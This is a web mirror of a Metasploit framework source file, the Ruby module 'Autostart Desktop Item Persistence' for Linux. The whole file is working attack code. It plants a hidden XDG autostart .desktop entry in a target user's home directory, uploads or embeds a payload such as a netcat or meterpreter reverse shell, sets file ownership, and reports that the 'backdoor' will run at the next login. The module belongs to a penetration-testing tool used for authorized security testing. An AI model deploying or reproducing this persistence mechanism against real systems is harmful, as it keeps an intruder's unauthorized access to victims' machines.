Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/persistence/autostart.rb
32103 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Unix

11
  include Msf::Exploit::EXE # for generate_payload_exe

12
  include Msf::Exploit::FileDropper

13
  include Msf::Post::Linux::User

14
  include Msf::Exploit::Local::Persistence

15
  prepend Msf::Exploit::Remote::AutoCheck

16
  include Msf::Exploit::Deprecated

17
  moved_from 'exploits/linux/local/autostart_persistence'

18


19
  def initialize(info = {})

20
    super(

21
      update_info(

22
        info,

23
        'Name' => 'Autostart Desktop Item Persistence',

24
        'Description' => %q{

25
          This module will create an autostart .desktop entry to execute a payload.

26
          The payload will be executed when the users logs in.

27
          Verified on Ubuntu 22.04 desktop with Gnome, and 18.04.3.

28
          The following payloads were used in testing:

29
          - cmd/unix/reverse_netcat

30
          - linux/x64/meterpreter/reverse_tcp

31
          - cmd/linux/http/x64/meterpreter/reverse_tcp

32
        },

33
        'License' => MSF_LICENSE,

34
        'Author' => [ 'Eliott Teissonniere' ],

35
        'Platform' => [ 'unix', 'linux' ],

36
        'Arch' => [

37
          ARCH_CMD,

38
          ARCH_X86,

39
          ARCH_X64,

40
          ARCH_ARMLE,

41
          ARCH_AARCH64,

42
          ARCH_PPC,

43
          ARCH_MIPSLE,

44
          ARCH_MIPSBE

45
        ],

46
        'Payload' => {

47
          'BadChars' => '#%\n"'

48
        },

49
        'SessionTypes' => [ 'shell', 'meterpreter' ],

50
        'DisclosureDate' => '2006-02-13', # Date of the 0.5 doc for autostart

51
        'Targets' => [['Automatic', {}]],

52
        'DefaultTarget' => 0,

53
        'References' => [

54
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

55
          ['ATT&CK', Mitre::Attack::Technique::T1547_013_XDG_AUTOSTART_ENTRIES],

56
          ['URL', 'https://specifications.freedesktop.org/autostart-spec/latest/'],

57
        ],

58
        'Notes' => {

59
          'Stability' => [CRASH_SAFE],

60
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

61
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

62
        }

63
      )

64
    )

65


66
    register_options([

67
      OptString.new('BACKDOOR_NAME', [false, 'Name of autostart entry' ]),

68
      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),

69
      OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),

70
    ])

71
  end

72


73
  def check

74
    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')

75
    # https://unix.stackexchange.com/a/237750

76
    return CheckCode::Safe('Xorg is not installed, likely a server install. Autostart requires a graphical environment') unless command_exists?('Xorg')

77


78
    CheckCode::Detected('Xorg is installed, possible desktop install.')

79
  end

80


81
  def target_user

82
    return datastore['USER'] unless datastore['USER'].blank?

83


84
    whoami

85
  end

86


87
  def install_persistence

88
    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp') && payload.arch.first != 'cmd'

89
    user = target_user

90
    home = get_home_dir(user)

91
    vprint_status('Making sure the autostart directory exists')

92
    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists

93


94
    name = datastore['BACKDOOR_NAME'] || Rex::Text.rand_text_alpha(5..8)

95
    path = "#{home}/.config/autostart/#{name}.desktop"

96


97
    print_status("Uploading autostart file #{path}")

98


99
    autostart_stub = [

100
      '[Desktop Entry]',

101
      'Type=Application',

102
      "Name=#{name}",

103
      'NoDisplay=true',

104
      'Terminal=false'

105
    ]

106


107
    if payload.arch.first == 'cmd'

108
      write_file(path, (autostart_stub + ["Exec=/bin/sh -c \"#{payload.encoded}\""]).join("\n"))

109
    else

110
      payload_path = writable_dir

111
      payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"

112
      payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)

113
      payload_path << payload_name

114
      print_status("Uploading payload file to #{payload_path}")

115
      upload_and_chmodx payload_path, generate_payload_exe

116
      write_file(path, (autostart_stub + ["Exec=\"#{payload_path}\""]).join("\n"))

117
      @clean_up_rc << "rm #{payload_path}\n"

118
    end

119


120
    if whoami != user

121
      cmd_exec("chown #{user}:#{user} #{path}")

122
      unless payload.arch.first == 'cmd'

123
        cmd_exec("chown #{user}:#{user} #{payload_path}")

124
      end

125
    end

126


127
    print_good("Backdoor will run on next login by #{user}")

128


129
    @clean_up_rc << "rm #{path}\n"

130
  end

131
end

132


133